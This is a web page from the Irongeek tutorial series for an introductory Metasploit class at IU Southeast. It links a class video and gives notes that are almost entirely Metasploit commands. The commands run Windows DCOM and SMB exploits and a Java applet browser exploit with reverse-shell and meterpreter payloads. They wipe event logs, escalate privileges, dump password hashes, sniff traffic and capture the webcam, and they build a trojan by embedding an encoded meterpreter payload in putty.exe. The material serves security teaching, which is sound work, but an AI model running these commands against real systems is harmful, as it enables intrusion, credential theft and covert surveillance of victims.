Intro to Metasploit Class at IU Southeast  (Hacking Illustrated Series InfoSec Tutorial Videos)

This is a class we did to introduce students to Metasploit at IU Southeast, with special guest lecturer Jeremy Druin (@webpwnize). To follow along, I recommend downloading Kali Linux. Big thanks to http://www.offensive-security.com/ and please donate to http://www.hackersforcharity.org/

Download:
https://archive.org/download/IntoToMetasploitClassAtIUSoutheast/Into%20to%20Metasploit%20Class%20at%20IU%20Southeast.mp4

Notes:

Metasploit Notes 1
(Based on http://www.offensive-security.com/metasploit-unleashed)

Show directory structure

cd /opt/metasploit/apps/pro/msf3

ls

cd modules

<tab it out>

cd /opt/metasploit/apps/pro/msf3

Updates

msfupdate

apt-get update;apt-get dist-upgrade

msfcli

msfcli exploits/windows/dcerpc/ms03_026_dcom O

msfcli exploits/windows/dcerpc/ms03_026_dcom P

msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP lhost=METASPLOIT-IP payload=windows/shell_reverse_tcp E

msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP E

msfconsole
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali

service postgresql start

service metasploit start

update-rc.d postgresql enable

update-rc.d metasploit enable

help

?

ping irongeek.com

search ms08

use exploit/windows/smb/ms08_067_netapi

back

info exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

show options

set rhost TARGET-IP

exploit

run

active vs passive

use exploit/multi/browser/java_signed_applet

set lport 3456

set SRVPORT 3245

set lhost METASPLOIT-IP

set APPLETNAME "Adrians_funapp"

set CERTCN irongeek.com

set ENCODER x86/shikata_ga_nai

set payload windows/meterpreter/reverse_tcp

set uripath /

run

jobs

kill 0

Social Engineering Toolkit Way

setoolkit

1  2  1 2

no

METASPLOIT-IP

irongeek.com

2 3

445

Meterpreter

ls

sysinfo

shell

exit

help

help core

background

sessions -l

sessions -i 1

cd

pwd

cat

clearev #Clear logs

getsystem

ps

migrate 608

getuid

hashdump

load -l

load sniffer

sniffer_interfaces

sniffer_start 1

sniffer_stats 1

sniffer_dump 1 /root/my.pcap

sniffer_stop 1

screenshot

resource somefile

run vnc

Using a Scanner

msfconsole

db_status

workspace

hosts

use auxiliary/scanner/smb/smb_version

set rhosts TARGET-IP/24

set threads 100

run

hosts

Trojans

/etc/init.d/apache2 start

cd /var/www

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe

Or

msfvenom -p windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 -x /var/www/putty.exe -e x86/shikata_ga_nai -i 15 -k -f exe > some.exe

(in msfconsole)

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST METASPLOIT-IP

set LPORT 443

exploit

(run the exe, and show some other things)

webcam_list

webcam_snap 1

run webcam

Armitage as Metasploit GUI

service postgresql start

service metasploit start

armitage

 




Copyright 2020, IronGeek